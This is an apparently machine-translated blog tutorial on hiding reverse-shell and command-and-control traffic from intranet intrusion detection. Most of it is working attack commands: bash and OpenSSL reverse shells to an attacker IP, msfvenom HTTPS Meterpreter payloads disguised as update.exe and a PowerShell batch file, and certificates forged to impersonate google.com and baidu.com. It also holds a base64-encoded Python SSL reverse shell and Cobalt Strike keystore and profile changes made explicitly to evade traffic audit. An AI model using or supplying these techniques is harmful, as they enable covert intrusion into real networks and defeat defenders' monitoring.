Write it at the front

• Blog home page ：Scorpio_m7,github
• Welcome to focus on the likes collection ️ Leaving a message.
• This paper is written by Scorpio_m7 original ,CSDN First episode ！
• Starting time ：2022 year 2 month 14 Japan
• ️ Persistence and hard work will surely bring poetry and distance ！
• The author's level is very limited , If an error is found , Please leave a message ！ Thank you very much ！

Preface

When the attacker needs to conduct horizontal penetration in the post penetration stage , Usually you need to bounce shell, If we bounce shell If it is all plaintext transmission , Intranet IDS And other safety equipment will analyze the flow , Malicious behavior detected , The defender will trace and analyze the attack traffic through security equipment , Aggressive behavior will be exposed , Therefore, the traffic needs to be encrypted .

unencrypted

Without encryption , adopt wireshark You can directly view the entered commands and returned contents by capturing packets . These will be IDS/IPS Wait for the safety equipment to detect , Encryption obfuscation is required .

• The attacker executes nc -lvp 8765
• The target machine executes bash -i >& /dev/tcp/192.168.211.129/8765 0>&1

Wireshark Catch a series of packets , Track any one TCP flow , Unencrypted , The communication between the attacker and the target is plaintext transmission , Therefore, traffic devices can easily view the behavior records of attackers .

OpenSSL

On the computer network ,OpenSSL Is an open source software library package , Applications can use this package for secure communication , Avoid eavesdropping , At the same time, confirm the identity of the connector at the other end . This package is widely used in web servers on the Internet .

SSL It enables users to / Communication between server applications is not eavesdropped by attackers , And always authenticate the server , You can also choose to authenticate users .SSL The protocol requires a reliable transport layer protocol (TCP) above .SSL The advantage of the protocol is that it is independent of the application layer protocol , High level application layer protocol ( for example ：HTTP,FTP,TELNET etc. ) Can be built transparently on SSL The agreement above .SSL The encryption algorithm has been completed before the application layer protocol communication 、 Communication key negotiation and server authentication . After that, the data transmitted by the application layer protocol will be encrypted , So as to ensure the privacy of communication .

netcat Traffic encryption

Attack aircraft use OpenSSL Generate a self-signed certificate . When generating a self signed certificate, you will be prompted to enter the certificate information , If you are too lazy to fill in, you can return all the way . After successful generation , There will be key.pem and cert.pem Encrypt file .

[email protected]:~/ desktop # openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a RSA private key
...................++++
...............................................++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

Use it on an attacker OpenSSL Listening port . here OpenSSL Then use the generated key file in the attack machine 8766 A... Is started on the port SSL/TLS server

[email protected]:~/ desktop # openssl s_server -quiet -key key.pem -cert cert.pem -port 8766

Perform bounce on the target shell command

[email protected]:~$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.211.129:8766 > /tmp/s; rm /tmp/s

The attacker successfully received the returned shell And execute the command . Use wireshark Grab the packets of communication between the two to view , It's all garbled , Traffic has been encrypted .

Metasploit Traffic encryption

In the use of MSF When conducting internal network horizontal penetration , Due to the extensive use of this tool , These traffic is easy to be detected and identified by the traffic audit tools in the intranet , So we need to encrypt its traffic .

OpenSSL Create certificate

Attack aircraft use OpenSSL simulation google Of SSL Certificate information , You can modify others by yourself . After generation , There will be www.google.com.pem Encrypt file . adopt cat www.google.com.pem View private keys and certificates

[email protected]:~/ desktop # openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \-keyout www.google.com.key \-out www.google.com.crt && \cat www.google.com.key www.google.com.crt > www.google.com.pem && \rm -f www.google.com.key www.google.com.crt
Generating a RSA private key
...............................................++++
..........................++++
writing new private key to 'www.google.com.key'
-----

After the certificate is created , We can go through MSF establish HTTP or HTTPS Type of payload , And provide it with pem Format certificate for verifying the connection . Here can be combined with other means of exemption . After generation , There will be update.exe Malicious files .

[email protected]:~/ desktop # msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.211.129 LPORT=4444 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerSSLCert=/root/ desktop /www.google.com.pem StagerVerifySSLCert=true -f exe -o /root/ desktop /update.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 514 bytes
Final size of exe file: 73802 bytes
Saved as: /root/ desktop /update.exe

- HandlerSSLCert： Notify the handler of the used PEM certificate .

- StagerVerifySSLCert： Execute when a connection is received SSL Certificate validation .

- PayloadUUIDTracking and PayloadUUIDName： You can filter out unwanted callback requests while listening .

It can also generate psh Type of Trojan . After generation , There will be shell.bat Malicious files .shell.bat By running powersell To obtain a session.

[email protected]:~/ desktop # msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.211.129 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/ desktop /www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o /root/ desktop /shell.bat
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 585 bytes
Final size of psh-cmd file: 7959 bytes
Saved as: /root/ desktop /shell.bat

Attackers start monitoring .HandlerSSLCert To notify the handler of the certificate it will use ,StagerVerifySSLCert Is to execute when a connection is received SSL Certificate validation . adopt show advanced see HandlerSSLCert Whether to call openssl The certificate created and StagerVerifySSLCert Open or not .

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST 192.168.211.129
LHOST => 192.168.211.129
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set HandlerSSLCert /root/ desktop /www.google.com.pem
HandlerSSLCert => /root/ desktop /www.google.com.pem
msf6 exploit(multi/handler) > set StagerVerifySSLCert true
StagerVerifySSLCert => true
msf6 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.211.129:4444

Will generate a good update.exe perhaps shell.bat Upload to target host , And execute the meterpreter. Pass on target host wireshark Grab packets and find , Traffic has been encrypted .

impersonate_ssl modular

Metasploit Frame built in auxiliary/gather/impersonate_ssl modular , It can be used to automatically create a fake certificate from the trust source . After executing the order, it will be /root/.msf4/loot/ Automatically generate high reliability PEM certificate , Repeat the above steps to use the certificate .

msf6 > use auxiliary/gather/impersonate_ssl 
msf6 auxiliary(gather/impersonate_ssl) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run

Use python Module for encryption

adopt MSF Generate python The executable payload. The default build is python2 Script for .

[email protected]:~/.msf4/loot# msfvenom -p cmd/unix/reverse_python_ssl lhost=192.168.211.129 lport=4444
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 629 bytes
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMjExLjEyOScsNDQ0NCkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQpOej1GYWxzZQp3aGlsZSBub3QgTno6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCU56ID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kKHN0ZG91dF92YWx1ZSkK')[0]))"

The attacker executes the following command to start monitoring ：

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_python_ssl
payload => cmd/unix/reverse_python_ssl
msf6 exploit(multi/handler) > set lhost 192.168.211.129
lhost => 192.168.211.129
msf6 exploit(multi/handler) > run
[*] Started reverse SSL handler on 192.168.211.129:4444 

Next, the target host uses msf Execute the generated payload. because python have access to -c Parameter loading arbitrary code , We use it directly in the code ssl Just encrypt the traffic in the Library .

C:\Users\root\IDA_Pro_v7.0_Portable\python27>python.exe -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMjExLjEyOScsNDQ0NCkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQpOej1GYWxzZQp3aGlsZSBub3QgTno6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCU56ID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kKHN0ZG91dF92YWx1ZSkK')[0]))"

Successful acquisition shell, And encrypted .

msf6 exploit(multi/handler) > run
[*] Started reverse SSL handler on 192.168.211.129:4444 
[*] Command shell session 1 opened (192.168.211.129:4444 -> 192.168.211.140:49569) at 2022-02-12 22:35:17 +0800

whoami
root-pc\root

Cobalt Strike Traffic encryption

Cobalt Strike It is the preferred attack artifact of many red teams , A wide range of applications , Lead to many IDS Intrusion detection tools and traffic detection tools can intercept and discover , Especially in terms of flow , If the default certificate is used for penetration and testing , It is easy to be detected by traffic and intercepted , Once found by security personnel, it will be repaired . We generate certificate modification C2 profile Encryption obfuscation , In fact, it is encrypted transmission of traffic , Purpose to escape traffic safety audit .

Remove certificate features

cobalt strike Default cobaltstrike.store The certificate will be tested . utilize keytool The tool generates a certificate .

[email protected]:~/ desktop /cobaltstrike4.3# keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu.com -dname "CN=US, OU="baidu.com", O="Sofatest", L=Beijing, ST=Cyberspace, C=CN"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Successfully generated a file named cobaltstrike.store Certificate , Put it in Cobalt Strike Directory . Use the command to view the certificate , Default password 123456.

[email protected]:~/ desktop /cobaltstrike4.3# keytool -list -v -keystore cobaltstrike.store
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
 Enter the keystore password :  
 Keystore type : PKCS12
 Keystore provider : SUN
 Your keystore contains  1  Entries 
 Alias : baidu.com
 Date of creation : 2022 year 2 month 13 Japan 
 Item type : PrivateKeyEntry
 Certificate chain length : 1
 certificate [1]:
 owner : CN=US, OU=baidu.com, O=Sofatest, L=Beijing, ST=Cyberspace, C=CN
 Publisher : CN=US, OU=baidu.com, O=Sofatest, L=Beijing, ST=Cyberspace, C=CN
 Serial number : 6eb54229
 entry-into-force time : Sun Feb 13 23:04:01 CST 2022,  Failure time : Sat May 14 23:04:01 CST 2022
 Certificate fingerprint :
	 SHA1: 68:11:27:4F:CF:07:64:39:A3:F5:2B:12:BA:EA:A4:10:8D:57:7D:9D
	 SHA256: B2:62:43:AB:C3:CB:3E:57:C3:5A:C5:E4:47:56:45:91:88:46:28:B1:6C:37:FD:F1:80:ED:FF:B8:84:26:5F:F4
 Signature algorithm name : SHA256withRSA
 Principal public key algorithm : 2048  position  RSA  secret key 
 edition : 3
 Expand : 
#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 0C BE 67 59 34 6F 03 D5   7C 50 60 F9 D2 AC FB 9A  ..gY4o...P`.....
0010: 24 1A 4D F5                                        $.M.
]
]

modify C2-profile file

C2-profile File is Cobalt Strike Built in tools , Used to control the Cobalt Strike Traffic , It can prevent the security equipment from monitoring and intercepting the traffic characteristics .

Download the corresponding cs Version of profile file , Make changes . The main thing that needs to be revised is https-certificate and code-signer Two places , Corresponding cobaltstrike.store Information in the file .

## Set Certificate , Pay attention to the following contents and generated cobaltstrike.store Same certificate 
https-certificate {
	set keystore "../cobaltstrike.store";
    set password "123456";
    #set C   "CN";
    #set CN  "US";
    #set O   "Sofatest";
    #set OU  "baidu.com";
	#set L  "Beijing";
	#set ST  "Cyberspace";
    #set validity "365";
}

And then use it Cobalt Strike Of c2lint To detect profile Is there a problem

[email protected]:/mnt/f/cobaltstrike/cobaltstrike4.3# ./c2lint ./malleable-c2-master/jquery-c2.4.3.profile 
[+] POST 3x check passed
[+] .http-get.server.output size is good
[+] .http-get.client size is good
[+] .http-post.client size is good
[+] .http-get.client.metadata transform+mangle+recover passed (1 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (100 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (128 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (256 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (0 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (1 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (48248 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (1048576 byte[s])
[+] .http-post.client.id transform+mangle+recover passed (4 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (0 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (1 byte[s])
[+] .http-post.client.output POSTs results
[+] .http-post.client.output transform+mangle+recover passed (48248 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (1048576 byte[s])
[+] Beacon profile specifies an HTTP Cookie header. Will tell WinINet to allow this.
[%] [OPSEC] .host_stage is true. Your Beacon payload is available to anyone that connects to your server to request it. Are you OK with this? 
[!] .code-signer.keystore is missing. Will not sign executables and DLLs
[+] Found SSL certificate keystore
[!] .https-certificate.password is the default '123456'. Is this really your keystore password?

To configure teamserver go online

modify teamserver Default port -Dcobaltstrike.server_port=49949 Post run .

[email protected]:/mnt/f/cobaltstrike/cobaltstrike4.3# ./teamserver 172.26.210.212 123456 ./malleable-c2-master/jquery-c2.4.3.profile

start-up Cobalt Strike Connect teamserver after , utilize HTTPS monitor , establish scripted web delivery Script , Discovery available ssl Certificate function . The production of powershell Command to the target host , Successful launch . adopt wireshark Captured tcp Traffic is in the form of garbled code after encrypted transmission